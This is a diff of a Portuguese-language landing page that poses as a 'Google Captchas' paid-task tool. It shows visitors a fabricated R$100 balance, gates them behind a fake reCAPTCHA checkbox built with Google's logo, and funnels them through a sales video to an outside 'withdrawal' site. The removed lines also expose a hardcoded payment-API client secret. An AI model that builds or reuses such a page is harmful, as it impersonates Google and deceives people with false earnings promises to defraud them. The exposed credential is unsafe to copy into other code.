--- a/index.html
+++ b/index.html
@@ -14,18 +14,21 @@
             justify-content: center;
             align-items: center;
             min-height: 100vh;
+            flex-direction: column;
         }
         .container {
-            max-width: 400px;
-            width: 100%;
+            max-width: 100%;
+            width: 400px;
             padding: 20px;
             background-color: white;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-            position: relative;
+            margin: 20px;
         }
         picture img {
             width: 100%;
             height: auto;
+            display: block;
+            margin: 0 auto;
         }
         .saldo {
             background-color: #4caf50;
@@ -38,6 +41,7 @@
         }
         .content {
             margin: 20px 0;
+            text-align: center;
         }
         .captcha {
             display: flex;
@@ -79,7 +83,7 @@
         }
         .popup {
             display: none;
-            position: absolute;
+            position: fixed;
             top: 50%;
             left: 50%;
             transform: translate(-50%, -50%);
@@ -111,6 +115,7 @@
             background-color: #f3f3f3;
             border-radius: 5px;
             margin-top: 20px;
+            overflow: hidden;
         }
         .progress-bar-fill {
             height: 20px;
@@ -120,28 +125,26 @@
             text-align: center;
             color: white;
             line-height: 20px;
+            transition: width 0.3s ease;
         }
         @media (max-width: 600px) {
             .container {
-                padding: 10px;
+                width: 90%;
+                padding: 15px;
             }
             .saldo {
                 font-size: 1.2em;
+                padding: 8px;
             }
             .btn {
                 font-size: 1em;
                 padding: 10px;
             }
+            .content h2 {
+                font-size: 18px;
+            }
         }
     </style>
-    <link rel="preload" href="https://scripts.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/player.js" as="script">
-    <link rel="preload" href="https://cdn.converteai.net/lib/js/smartplayer/v1/smartplayer.min.js" as="script">
-    <link rel="preload" href="https://images.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/thumbnail.jpg" as="image">
-    <link rel="preload" href="https://cdn.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/663fd08d4cd641000b73e481/main.m3u8" as="fetch">
-    <link rel="dns-prefetch" href="https://cdn.converteai.net">
-    <link rel="dns-prefetch" href="https://scripts.converteai.net">
-    <link rel="dns-prefetch" href="https://images.converteai.net">
-    <link rel="dns-prefetch" href="https://api.vturb.com.br">
 </head>
 <body>
     <div class="container" id="page1">
@@ -150,18 +153,21 @@
             <source srcset="assets/img/img1.png" type="image/png">
             <img src="assets/img/img1.png" alt="Google Captchas">
         </picture>
-        <div class="saldo" id="saldo">
-            Saldo: R$100,00
-        </div>
+        <div class="saldo" id="saldo">Saldo: R$100,00</div>
         <div class="content">
-            <h2 style="font-size: 21px;">Parabéns, você foi selecionado!</h2>
+            <h2>Parabéns, você foi selecionado!</h2>
             <p>O Google Captchas precisa de você para aumentar a segurança dos seus sites analisando se os Captchas estão marcados corretamente ou incorretamente.</p>
-            <p>Você acaba de receber acesso à nova ferramenta do Google para análise de Captchas. <b>Aproveite, você já ganhou R$100,00</b>!</p>
             <p>Complete 7 Tarefas Simples e realize seu primeiro saque em minutos.</p>
             <p>Complete o Captcha para Começar a sua Primeira Tarefa.</p>
         </div>
         <div class="captcha">
-            <div class="g-recaptcha" data-sitekey="6LeFvSEqAAAAAIn7IAxAsaJMtpLyjo4DmINrfEU9" data-callback="recaptchaCallback"></div>
+            <div id="customCaptcha">
+                <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="reCAPTCHA" width="48" height="48">
+                <div style="display: inline-block; position: relative;">
+                    <input type="checkbox" id="customCaptchaCheckbox" style="transform: scale(1.5); position: relative; top: 10px; margin-left: 10px;">
+                    <label for="customCaptchaCheckbox" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; cursor: pointer;"></label>
+                </div>
+            </div>
         </div>
         <button class="btn" id="startButton" disabled>Começar Agora</button>
         <div class="error" id="errorMessage"></div>
@@ -173,12 +179,8 @@
             <source srcset="assets/img/img1.png" type="image/png">
             <img src="assets/img/img1.png" alt="Google Captchas">
         </picture>
-        <div class="saldo" id="taskSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="progresso" id="progresso">
-            Tarefa 1 de 7
-        </div>
+        <div class="saldo" id="taskSaldo">Saldo: R$100,00</div>
+        <div class="progresso" id="progresso">Tarefa 1 de 7</div>
         <div class="task-value" id="taskValue">Valor da Tarefa: R$15,00</div>
         <div class="content">
             <p id="taskText">Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.</p>
@@ -202,12 +204,10 @@
             <source srcset="assets/img/img1.png" type="image/png">
             <img src="assets/img/img1.png" alt="Google Captchas">
         </picture>
-        <div class="saldo" id="completedSaldo">
-            Saldo: R$100,00
-        </div>
+        <div class="saldo" id="completedSaldo">Saldo: R$100,00</div>
         <div class="content">
             <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
-            <h2 style="font-size: 21px; text-align: center;">Tarefas Concluídas!</h2>
+            <h2 style="font-size: 21px;">Tarefas Concluídas!</h2>
             <p>Parabéns, as tarefas foram concluídas com sucesso! Agora, assista um rápido vídeo para estar podendo realizar o seu saque de forma imediata.</p>
             <p>Toque no botão abaixo para assistir o vídeo e realizar o seu saque.</p>
         </div>
@@ -220,12 +220,10 @@
             <source srcset="assets/img/img1.png" type="image/png">
             <img src="assets/img/img1.png" alt="Google Captchas">
         </picture>
-        <div class="saldo" id="finalSaldo">
-            Saldo: R$100,00
-        </div>
+        <div class="saldo" id="finalSaldo">Saldo: R$100,00</div>
         <div class="content">
             <p>O saque será liberado ao final deste vídeo! Assista e entenda como funciona o Google Captcha e porque você está sendo pago para melhorar a segurança de nossa ferramenta.</p>
-            <div id="vid_663fd09d62dd4d000b35368e" style="position:relative;width:100%;padding: 177.77777777777777% 0 0;">
+            <div id="vid_663fd09d62dd4d000b35368e" style="position:relative;width:100%;padding-top:56.25%;">
                 <img id="thumb_663fd09d62dd4d000b35368e" src="https://images.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/thumbnail.jpg" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;display:block;">
                 <div id="backdrop_663fd09d62dd4d000b35368e" style="position:absolute;top:0;width:100%;height:100%;-webkit-backdrop-filter:blur(5px);backdrop-filter:blur(5px);"></div>
             </div>
@@ -233,36 +231,7 @@
                 var s=document.createElement("script");
                 s.src="https://scripts.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/player.js", s.async=!0,document.head.appendChild(s);
             </script>
-            <style>
-                .elementor-element:has(#smartplayer) { width: 100%; }
-            </style>
             <button class="btn btn-green" id="withdrawButton" style="display:none;">Realizar Saque Agora</button>
-        </div>
-    </div>
-
-    <div class="container" id="withdrawPage" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="withdrawSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <p>Insira sua chave pix abaixo para sacar suas comissões das tarefas concluidas do Google Captcha e poder continuar realizando novas tarefas.</p>
-            <form id="pixForm">
-                <label for="pixType">Tipo de Chave Pix:</label>
-                <select id="pixType" name="pixType" required>
-                    <option value="cpf">CPF</option>
-                    <option value="celular">Celular</option>
-                    <option value="email">Email</option>
-                </select>
-                <label for="pixKey">Chave Pix:</label>
-                <input type="text" id="pixKey" name="pixKey" required>
-                <button type="submit" class="btn btn-green">Enviar</button>
-            </form>
-            <div class="error" id="pixErrorMessage"></div>
         </div>
     </div>
 
@@ -271,7 +240,6 @@
         <p id="popupText"></p>
     </div>
     
-    <script src="https://www.google.com/recaptcha/api.js"></script>
     <script>
         const tasks = [
             { imageWebp: 'assets/img/captcha1.webp', imagePng: 'assets/img/captcha1.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.', answer: 'sim' },
@@ -325,20 +293,42 @@
             }, 3000);
         }
 
-        function recaptchaCallback() {
-            document.getElementById('startButton').disabled = false;
-            document.getElementById('startButton').classList.add('btn-green');
-            new Audio('assets/audio/ok.mp3').play();
-        }
+        document.getElementById('customCaptchaCheckbox').addEventListener('change', function() {
+            if (this.checked) {
+                document.getElementById('startButton').disabled = false;
+                document.getElementById('startButton').classList.add('btn-green');
+                new Audio('assets/audio/ok.mp3').play();
+            } else {
+                document.getElementById('startButton').disabled = true;
+                document.getElementById('startButton').classList.remove('btn-green');
+            }
+        });
 
         document.getElementById('startButton').addEventListener('click', function() {
-            if (grecaptcha.getResponse() === '') {
-                document.getElementById('errorMessage').innerText = 'Por favor, conclua o captcha antes de continuar.';
-            } else {
-                document.getElementById('page1').style.display = 'none';
-                document.getElementById('page2').style.display = 'block';
-                updateTask();
-            }
+            document.getElementById('page1').style.display = 'none';
+            document.getElementById('page2').style.display = 'block';
+            updateTask();
+        });
+
+        document.getElementById('withdrawButton').addEventListener('click', function() {
+            window.location.href = "https://captchapay.org/saque/";
+        });
+
+        document.getElementById('yesButton').addEventListener('click', function() {
+            validateAnswer('sim');
+        });
+
+        document.getElementById('noButton').addEventListener('click', function() {
+            validateAnswer('não');
+        });
+
+        document.getElementById('goToVideoButton').addEventListener('click', function() {
+            document.getElementById('tasksCompletedPage').style.display = 'none';
+            document.getElementById('pageFinal').style.display = 'block';
+            document.getElementById('finalSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+            setTimeout(() => {
+                document.getElementById('withdrawButton').style.display = 'block';
+            }, 1000); // 1 minuto
         });
 
         function validateAnswer(answer) {
@@ -362,60 +352,6 @@
             currentTask++;
             updateTask();
         }
-
-        document.getElementById('yesButton').addEventListener('click', function() {
-            validateAnswer('sim');
-        });
-
-        document.getElementById('noButton').addEventListener('click', function() {
-            validateAnswer('não');
-        });
-
-        document.getElementById('goToVideoButton').addEventListener('click', function() {
-            document.getElementById('tasksCompletedPage').style.display = 'none';
-            document.getElementById('pageFinal').style.display = 'block';
-            setTimeout(() => {
-                document.getElementById('withdrawButton').style.display = 'block';
-            }, 60000); // 1 minuto
-        });
-
-        document.getElementById('withdrawButton').addEventListener('click', function() {
-            document.getElementById('pageFinal').style.display = 'none';
-            document.getElementById('withdrawPage').style.display = 'block';
-            document.getElementById('withdrawSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-        });
-
-        document.getElementById('pixForm').addEventListener('submit', function(event) {
-            event.preventDefault();
-            const pixKey = document.getElementById('pixKey').value;
-            const pixType = document.getElementById('pixType').value;
-            const data = {
-                client_id: 'wjmkt_1713979947271',
-                client_secret: '49d8d1419abe58357fa6ec5d4e562b302c6c661df14ff8b745b6b3376df4cb4c3478cd59160d456791aa555dcae974ee',
-                key_pix: pixKey,
-                key_type: pixType,
-                value: saldo.toFixed(2),
-            };
-
-            fetch('https://ws.suitpay.app/', {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json',
-                },
-                body: JSON.stringify(data),
-            })
-            .then(response => response.json())
-            .then(data => {
-                if (data.success) {
-                    alert('Pagamento realizado com sucesso!');
-                } else {
-                    document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
-                }
-            })
-            .catch((error) => {
-                document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
-            });
-        });
     </script>
 </body>
 </html>
